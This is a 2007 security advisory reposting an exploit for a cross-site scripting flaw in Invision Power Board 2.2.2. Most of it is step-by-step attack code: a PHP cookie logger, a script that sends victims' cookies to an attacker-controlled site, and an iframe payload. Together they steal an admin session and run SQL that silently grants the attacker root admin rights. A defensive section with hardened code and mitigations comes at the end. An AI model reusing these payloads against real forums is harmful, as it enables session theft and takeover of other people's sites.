Sunday, June 03, 2007

[EXPL] Invision Power Board Cross Site Scripting Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Invision Power Board Cross Site Scripting Vulnerability
------------------------------------------------------------------------


SUMMARY

A vulnerability in Invision Power Board allows remote attackers to carry out
cross site scripting attacks, which in turn can be used to cause the
administrator of the forum, or any other privileged user, to execute
arbitrary commands (SQL commands). The following exploit code can be used
to test your system for the mentioned vulnerability.

DETAILS

Vulnerable Systems:
* Invision Power Board version 2.2.2

Exploit:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (http://www.ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
# See:

var editor_id = <?php print
'"'.trim($_REQUEST['editorid']).'";'; ?>

#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other users to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#

<?php
$target = "http://www.yourtarget.com/forum"; # Target forum without trailing slash
$prefix = "ibf_"; # Database prefix, default: ibf_
$member = 22; # Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time:
".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<iframe width=0 height=0
src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Also create a file in the same directory named "log.txt" and chmod it 777
#
# Now, create a file called script.js on your webserver, put this code in it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
#
# And, last but not least, create a file that combines those two ;)
# Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#

<iframe border=0
src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Now, post a message on the forum or send a pm to your target with the
# link to the html page.
# If a normal user views the page, his cookies will be logged, funny.
# If an admin visits the page and he has an admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).
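The root cause quoted at the top of the exploit is a request parameter echoed straight into a `<script>` block. Below is an added example (not Invision Power Board's code and not part of the advisory) that puts that vulnerable pattern next to a hardened version of the same line. The function names `editor_id_vulnerable()`, `editor_id_hardened()` and the constant `DEFAULT_EDITOR_ID` are assumptions made for the example; the sample inputs are constructed.

```php
<?php
// Added example, not Invision Power Board's code and not the advisory's:
// the vulnerable pattern next to a hardened version of the same line.
// Assumed names: editor_id_vulnerable(), editor_id_hardened(), DEFAULT_EDITOR_ID.

const DEFAULT_EDITOR_ID = 'ed_default';

// Vulnerable pattern, as quoted from module_table.php in the advisory:
// the request value is placed between quotes inside a <script> block with
// no encoding, so a value containing " or </script> leaves the JS string
// and the rest of the value is parsed as markup/script.
function editor_id_vulnerable(string $request_value): string {
    return 'var editor_id = "' . trim($request_value) . '";';
}

// Hardened version. The editor id is an internal DOM identifier, so an
// allow-list is the right check; anything outside it falls back to a
// known-good default instead of being "cleaned". json_encode() then emits
// a correct JS string literal, and the JSON_HEX_* flags escape < > & ' "
// as \uXXXX so the sequence "</script>" can never appear literally.
function editor_id_hardened(string $request_value): string {
    $id = trim($request_value);
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $id)) {
        $id = DEFAULT_EDITOR_ID;
    }
    $literal = json_encode($id, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return 'var editor_id = ' . $literal . ';';
}

// Constructed sample inputs: a normal id and the breakout shape the
// advisory's PoC uses (hostname replaced with a placeholder).
$samples = [
    'ed_1',
    '//--></script><script src=http://attacker.example/x.js>',
];
foreach ($samples as $s) {
    echo "input:      ", $s, "\n";
    echo "vulnerable: ", editor_id_vulnerable($s), "\n";
    echo "hardened:   ", editor_id_hardened($s), "\n\n";
}
```

Run it with `php example.php`; the second input shows the vulnerable line closing the script tag while the hardened line emits only the default id. The second stage of the PoC also depends on two independent weaknesses: the admin session id is readable from `document.cookie`, and the admin SQL tool accepts that id from a URL parameter with no per-request token. Marking session cookies `HttpOnly` and requiring a CSRF token on state-changing admin actions close that path even if another injection point is found.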


ADDITIONAL INFORMATION

The information has been provided by Iron.
The original article can be found at: <http://www.ironwarez.info>


